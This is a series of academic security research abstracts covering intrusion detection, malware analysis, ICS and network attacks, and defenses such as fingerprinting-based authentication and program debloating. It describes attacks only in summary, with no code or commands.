Detection of Intrusions and Malware, and Vulnerability Assessment

With browsers being a ubiquitous, if not required, method to access the web, they represent a unique and universal threat vector. Browsers can run third-party extensions virtually invisibly in the background after a quick install. In this paper, we explore the abuse of browser extensions that achieve installations via suspicious methods. We scan the web for links to extension installations by performing a web crawling of the Alexa top 10,000 websites with recursive sub-page depth of 4 and leverage other tools to search for artifacts in the source code of webpages. We discover pages that have links to both listed and unlisted extensions, many times pointing to multiple different extensions that share the same name. Using this data, we were able to find 1,097 unlisted browser extensions ranging from internal directory lookup tools to hidden Google Docs extensions that pose a serious threat to their 127 million users.

In this paper, we present the first fingerprinting-based authentication scheme that is not vulnerable to trivial replay attacks. Our proposed canvas-based fingerprinting technique utilizes one key characteristic: it is parameterized by a challenge, generated on the server side. We perform an in-depth analysis of all parameters that can be used to generate canvas challenges, and we show that it is possible to generate unique, unpredictable, and highly diverse canvas-generated images each time a user logs onto a service. With the analysis of images collected from more than 1.1 million devices in a real-world large-scale experiment, we evaluate our proposed scheme against a large set of attack scenarios and conclude that canvas fingerprinting is a suitable mechanism for stronger authentication on the web.

Online collaboration services (OCS) are appealing since they provide ease of access to resources and the ability to collaborate on shared files. Documents on these services are frequently shared via secret links, which allows easy collaboration between different users. The security of this secret link approach relies on the fact that only those who know the location of the secret resource (i.e., its URL) can access it. In this paper, we show that the secret location of OCS files can be leaked by the improper handling of links embedded in these files. Specifically, if a user clicks on a link embedded into a file hosted on an OCS, the HTTP Referer contained in the resulting HTTP request might leak the secret URL. We present a study of 21 online collaboration services and show that seven of them are vulnerable to this kind of secret information disclosure caused by the improper handling of embedded links and HTTP Referers. We identify two root causes of these issues, both having to do with an incorrect application of the Referrer Policy, a countermeasure designed to restrict how HTTP Referers are shared with third parties. In the first case, six services leak their referrers because they do not implement a strict enough and up-to-date policy. In the second case, one service correctly implements an appropriate Referrer Policy, but some web browsers do not obey it, causing links clicked through them to leak their HTTP Referers. To fix this problem, we discuss how services can apply the Referrer Policy correctly to avoid these incidents, as well as other server and client side countermeasures.

Industrial Control Systems (ICS) are attractive targets to attackers because of the significant cyber-physical damage they can inflict. As such, they are often subjected to reconnaissance campaigns aiming at discovering vulnerabilities that can be exploited online. As these campaigns scan large netblocks of the Internet, some of the IP packets are directed to the darknet, routable, allocated and unused IP space. In this paper, we propose a new technique to detect, fingerprint, and track probing campaigns targeting ICS systems by leveraging a /13 darknet traffic. Our proposed technique detects, automatically, and in near-real time such ICS probing campaigns and generates relevant and timely cyber threat intelligence using graph-theoretic methods to compare and aggregate packets into campaigns. Besides, it ascribes to each observed campaign a fingerprint that uniquely characterizes it and allows its tracking over time. Our technique has been tested over 12.85 TB of data, which represents 330 days of darknet network traffic received. The result of our analysis allows for the discovery of not only known legitimate recurrent probing campaigns such as those performed by Shodan and Censys but also uncovers coordinated campaigns launched by other organizations. Furthermore, we give details on a campaign linked to botnet activity targeting the EtherNet/IP protocol.

Programmable logic controllers (PLCs) in industrial control systems (ICS) are vulnerable to remote control logic injection attacks. Attackers target the control logic of a PLC to manipulate the behavior of a physical process such as nuclear plants, power grids, and gas pipelines. Control logic attacks have been studied extensively in the literature, including hiding the transfer of a control logic over the network from both packet header-based signatures, and deep packet inspection. For instance, these attacks transfer a control logic code as data, into small fragments (one-byte per packet), that are further padded with noise data. To detect control logic in ICS network traffic, this paper presents Shade, a novel shadow memory technique that observes the network traffic to maintain a local copy of the current state of a PLC memory. To analyze the memory contents, Shade employs a classification algorithm with 42 unique features categorized into five types at different semantic levels of a control logic code, such as number of rungs, number of consecutive decompiled instructions, and n-grams. We then evaluate Shade against control logic injection attacks on two PLCs, Modicon M221 and MicroLogix 1400 from two ICS vendors, Schneider electric and Allen-Bradley, respectively. The evaluation results show that Shade can detect an attack instance (i.e., identifying at least one attack packet during the transfer of a malicious control logic) accurately without any false alarms.

Heavy industrial machinery is a primary asset for the operation of key sectors such as construction, manufacturing, and logistics. Targeted attacks against these assets could result in incidents, fatal injuries, and substantial financial loss. Given the importance of such scenarios, we analyzed and evaluated the security implications of the technology used to operate and control this machinery, namely industrial radio remote controllers. We conducted the first-ever security analysis of this technology, which relies on proprietary radio-frequency protocols to implement remote-control functionalities. Through a two-phase evaluation approach we discovered important flaws in the design and implementation of industrial remote controllers. In this paper we introduce and describe 5 practical attacks affecting major vendors and multiple real-world installations. We conclude by discussing how a challenging responsible disclosure process resulted in first-ever security patches and improved security awareness.

With the proliferation of using smart and connected devices in the transportation domain, these systems inevitably face security threats from the real world. In this work, we analyze the security of the existing traffic signal systems and summarize the security implications exposed in our analysis. Our research shows that the deployed traffic signal systems can be easily manipulated with physical/remote access and are vulnerable to an array of real-world attacks such as a diversionary tactic. By setting up a standard traffic signal system locally in our lab and partnering with a municipality, we demonstrate that not only can traffic intersections be manipulated to show deadly traffic patterns such as all-direction green lights, but traffic control systems are also susceptible to ransomware and disruption attacks. Through testing and studying these attacks, we provide our security recommendations and mitigations to these threats.

Modern CPU architectures offer strong isolation guarantees towards user applications in the form of enclaves. However, Intel’s threat model for SGX assumes fully trusted enclaves and there doubt about how realistic this is. In particular, it is unclear to what extent enclave malware could harm a system. In this work, we practically demonstrate the first enclave malware which fully and stealthily impersonates its host application. Together with poorly-deployed application isolation on personal computers, such malware can not only steal or encrypt documents for extortion but also act on the user’s behalf, e.g., send phishing emails or mount denial-of-service attacks. Our SGX-ROP attack uses new TSX-based memory-disclosure primitive and a write-anything-anywhere primitive to construct a code-reuse attack from within an enclave which is then inadvertently executed by the host application. With SGX-ROP, we bypass ASLR, stack canaries, and address sanitizer. We demonstrate that instead of protecting users from harm, SGX currently poses a security threat, facilitating so-called super-malware with ready-to-hit exploits. With our results, we demystify the enclave malware threat and lay ground for future research on defenses against enclave malware.

Many malware programs execute operations for analysis evasion. They include sandbox detection through measurement of execution time or executed CPU cycles with a method that exploits the RDTSC instruction. Although the detection technique is widely known and well-studied, the actual usage of the RDTSC instruction by real malware has not yet been sufficiently clarified. In this paper, we present analysis results for RDTSC usage collected from more than 200,000 malware files. In this analysis, malware programs are searched for closely placed pairs of RDTSCs; then, code fragments surrounding these pairs are extracted. A system developed by the authors classifies the extracted code fragments into distinct groups based on their characteristics, according to a set of rules that matches the fragments with instruction patterns. The results indicate that malware programs measure the number of CPU cycles of diverse operations and can also execute the RDTSC instruction for other purposes, such as obfuscation and acquisition of random values.

In order to detect malicious file system activity, some commercial and academic anti-ransomware solutions implement deception-based techniques, specifically by placing decoy files among user files. While this approach raises the bar against current ransomware, as any access to a decoy file is a sign of malicious activity, the robustness of decoy strategies has not been formally analyzed and fully tested. In this paper, we analyze existing decoy strategies and discuss how they are effective in countering current ransomware by defining a set of metrics to measure their robustness. To demonstrate how ransomware can identify existing deception-based detection strategies, we have implemented a proof-of-concept anti-decoy ransomware that successfully bypasses decoys by using a decision engine with few rules. Finally, we discuss existing issues in decoy-based strategies and propose practical solutions to mitigate them.

PowerShell is nowadays a widely-used technology to administrate and manage Windows-based operating systems. However, it is also extensively used by malware vectors to execute payloads or drop additional malicious contents. Similarly to other scripting languages used by malware, PowerShell attacks are challenging to analyze due to the extensive use of multiple obfuscation layers, which make the real malicious code hard to be unveiled. To the best of our knowledge, a comprehensive solution for properly de-obfuscating such attacks is currently missing. In this paper, we present PowerDrive, an open-source, static and dynamic multi-stage de-obfuscator for PowerShell attacks. PowerDrive instruments the PowerShell code to progressively de-obfuscate it by showing the analyst the employed obfuscation steps. We used PowerDrive to successfully analyze thousands of PowerShell attacks extracted from various malware vectors and executables. The attained results show interesting patterns used by attackers to devise their malicious scripts. Moreover, we provide a taxonomy of behavioral models adopted by the analyzed codes and a comprehensive list of the malicious domains contacted during the analysis.

Memory corruption attacks against software written in C or C++ are still prevalent and remain a significant cause of security breaches. Defenses providing full memory safety remain expensive, and leaner defenses only addressing control-flow data are insufficient.

We introduce memory categorization, an approach to separate data based on attacker control to mitigate the exploitation of memory corruption vulnerabilities such as use-after-free and use-after-return. MemCat implements this approach by: (i) providing separate memory allocators for different data categories, (ii) categorizing the use of memory allocations, (iii) changing allocations to take advantage of the categorization.

The binary similarity problem consists in determining if two functions are similar by only considering their compiled form. Techniques for binary similarity have an immediate practical impact on several fields such as copyright disputes, malware analysis, vulnerability detection, etc. Current solutions compare functions by first transforming their binary code in multi-dimensional vector representations (embeddings), and then comparing vectors through simple and efficient geometric operations. In this paper we propose SAFE, a novel architecture for the embedding of functions based on a self-attentive neural network. SAFE works directly on disassembled binary functions, does not require manual feature extraction, is computationally more efficient than existing solutions, and is more general as it works on stripped binaries and on multiple architectures. We report the results from a quantitative and qualitative analysis that show how SAFE provides a noticeable performance improvement with respect to previous solutions. Furthermore, we show how clusters of our embedding vectors are closely related to the semantic of the implemented algorithms, paving the way for further interesting applications.

Cryptographic libraries often feature multiple implementations of primitives to meet both the security needs of handling private information and the performance requirements of modern services when the handled information is public. OpenSSL, the de-facto standard free and open source cryptographic library, includes mechanisms to differentiate the confidential data and its control flow, including run-time flags, designed for hardening against timing side-channels, but repeatedly accidentally mishandled in the past. To analyze and prevent these accidents, we introduce Triggerflow, a tool for tracking execution paths that, assisted by source annotations, dynamically analyzes the binary through the debugger. We validate this approach with case studies demonstrating how adopting our method in the development pipeline would have promptly detected such accidents. We further show-case the value of the tooling by presenting two novel discoveries facilitated by Triggerflow: one leak and one defect.

The Domain Name System (DNS) is a fundamental backbone service of the Internet. In practice, this infrastructure often shows flaws, which indicate that measuring the DNS is important to understand potential (security) issues. Several works deal with the DNS and present such problems, mitigations, and attack vectors. A so far overlooked issue is the fact that DNS servers might answer with information about internal network information (e.g., hostnames) to external queries. This behavior results in a capability to perform an active network reconnaissance without the need for individual vulnerabilities or exploits. Analyzing how public DNS services might involuntarily disclose sensitive information ties in with the trust we have on Internet services.

To investigate this phenomenon, we conducted a systematic measurement study on this topic. We crawl all public reachable DNS servers in 15 scans over a period of almost six months and analyze up to 574,000 DNS servers per run that are configured in a way that might lead to this kind of information leakage. With this large-scale evaluation, we show that the amount of this possible infrastructure leaking DNS servers is on average almost 4% over all of our scans on every reachable DNS servers on the Internet. Based on our newest scan, the countries with most of these servers are Romania, China, and the US. In these countries, the share of such servers among of all reachable servers is about 15% in Romania, 9% in China, and 2.9% in the US. A detailed analysis of the responses reveals that not all answers provide useful information for an adversary. However, we found that up to 158,000 DNS servers provide potentially exploitable information in the wild. Hence, this measurement study demonstrates that the configuration of a DNS server should be executed carefully; otherwise, it may be possible to disclose too much information.

The Domain Name System is a critical piece of infrastructure that has expanded into use cases beyond its original intent. DNS TXT records are intentionally very permissive in what information can be stored there, and as a result are often used in broad and undocumented ways to support Internet security and networked applications. In this paper, we identified and categorized the patterns in TXT record use from a representative collection of resource record sets. We obtained the records from a data set containing 1.4 billion TXT records collected over a 2 year period and used pattern matching to identify record use cases present across multiple domains. We found that 92% of these records generally fall into 3 categories; protocol enhancement, domain verification, and resource location. While some of these records are required to remain public, we discovered many examples that unnecessarily reveal domain information or present other security threats (e.g., amplification attacks) in conflict with best practices in security.

Current developments in digitization and industry 4.0 bear new challenges for automation systems. In order to enable interoperability and vertical integration of corporate management systems, these networks have evolved from formerly proprietary solutions to the application of Ethernet-based communication and internet standards. This development is accompanied by an increase in the number of threats. Although the most critical IT protection objective for automation systems is availability, usually no security mechanisms have been integrated into automation protocols. Also Ethernet offers no protection by design for these protocols. One of the most popular real-time protocols for industrial applications is Profinet IO. In this paper, we describe a Denial-of-Service attack on Profinet IO that exploits a vulnerability in the Discovery and Basic Configuration Protocol (DCP) which interrupts the Application Relationship between an IO Controller and an IO Device, and thus prevents the system from being repaired by the operator. The attack combines port stealing with the sending of forged DCP packets and causes a system downtime, which in affected production networks probably lead to a serious financial damage and, in case of critical infrastructures, even represents a high risk for the supply of society. We demonstrate the practical feasibility of the attack using realistic hardware and scenarios and discuss its significance for also other setups.

SDN-based NFV technologies improve the dependability and resilience of networks by enabling administrators to spawn and scale-up traffic management and security services in response to dynamic network conditions. However, in practice, SDN-based NFV services often suffer from poor performance and require complex configurations due to the fact that network packets must be ‘detoured’ to each virtualized security service, which expends bandwidth and increases network propagation delay. To address these challenges, we propose a new SDN-based data plane architecture called DPX that natively supports security services as a set of abstract security actions that are then translated to OpenFlow rule sets. The DPX action model reduces redundant processing caused by frequent packet parsing and provides administrators a simplified (and less error-prone) method for configuring security services into the network. DPX also increases the efficiency of enforcing complex security policies by introducing a novel technique called action clustering, which aggregates security actions from multiple flows into a small number of synthetic rules. We present an implementation of DPX in hardware using NetFPGA-SUME and in software using Open vSwitch. We evaluated the performance of the DPX prototype and the efficacy of its flow-table simplifications against a range of complex network policies exposed to line rates of 10 Gbps. We find that DPX imposes minimal overheads in terms of latency (\(\approx \)0.65 ms in hardware and \(\approx \)1.2 ms in software on average) and throughput (\(\approx \)1% of simple forwarding in hardware and \(\approx \)10% in software for non-DPI security services). This translates to an improvement of 30% over traditional NFV services on the software implementation and 40% in hardware.

Text-based passwords are still the dominant form of user authentication in remote services. Beyond the many usability issues associated with handling several text-based passwords, security is also an important dimension. Through the years, a significant amount of on-line services has been compromised and their stored passwords have been leaked. Once the database is compromised, it takes little time for a program to crack the cryptographically hashed (weak) passwords, no matter the algorithm used.

In response to this problem, researchers have proposed cryptographic services for hardening all stored passwords. These services perform several sessions of cryptographic hashing combined with message authentication codes. The goal of these services is to coerce adversaries to use them while cracking the passwords. This essentially transforms off-line password cracking to on-line.

Although these services incorporate elaborate cryptographic schemes for password hardening, it is unclear how easily typical web sites can utilize them without outsourcing the functionality to large providers. In this paper, we take a systems approach for making any web site that is serviced through TLS capable of strongly hardening their passwords. We observe that any TLS-enabled web server is already equipped with strong cryptographic functions. We modify mod_ssl, the module that offers TLS to any Apache web server, to act as a password-hardening service. Our evaluation shows that with an overhead similar to adapting hash functions (such as scrypt and bcrypt), our proposal can protect even the weakest passwords, once they are leaked.

In smart buildings, cyber-physical components (e.g., controllers, sensors, and actuators) communicate with each other using network protocols such as BACnet. Many of these devices are now connected to the Internet, enabling attackers to exploit vulnerabilities on protocols and devices to attack buildings. Situational awareness and intrusion detection are thus critical to provide operators with a clear and dynamic picture of their network, and to allow them to react to threats and attacks. Due to Smart Buildings being relatively dynamic and heterogeneous environments, situational awareness further needs to rapidly adapt to the appearance of new devices, and to provide enough context and information to understand a device’s behavior. In this paper, we propose a novel approach to situational awareness that leverages a combination of learning and knowledge of possible role devices. Specifically, we introduce a role-based situational awareness and intrusion detection system to monitor BACnet building automation networks. The system discovers devices, classifies them according to functional roles and detects deviations from the assigned roles. To validate our approach, we use a simulated dataset generated from a BACnet testbed, as well as a real-world dataset coming from the building network of a Dutch university.

The increasing complexity of modern programs motivates software engineers to often rely on the support of third-party libraries. Although this practice allows application developers to achieve a compelling time-to-market, it often makes the final product bloated with conspicuous chunks of unused code. Other than making a program unnecessarily large, this dormant code could be leveraged by willful attackers to harm users. As a consequence, several techniques have been recently proposed to perform program debloating and remove (or secure) dead code from applications. However, state-of-the-art approaches are either based on unsound strategies, thus producing unreliable results, or pose too strict assumptions on the program itself.

In this work, we propose a novel abstract domain, called Signedness-Agnostic Strided Interval, which we use as the cornerstone to design a novel and sound static technique, based on abstract interpretation, to reliably perform program debloating. Throughout the paper, we detail the specifics of our approach and show its effectiveness and usefulness by implementing it in a tool, called BinTrimmer, to perform static program debloating on binaries.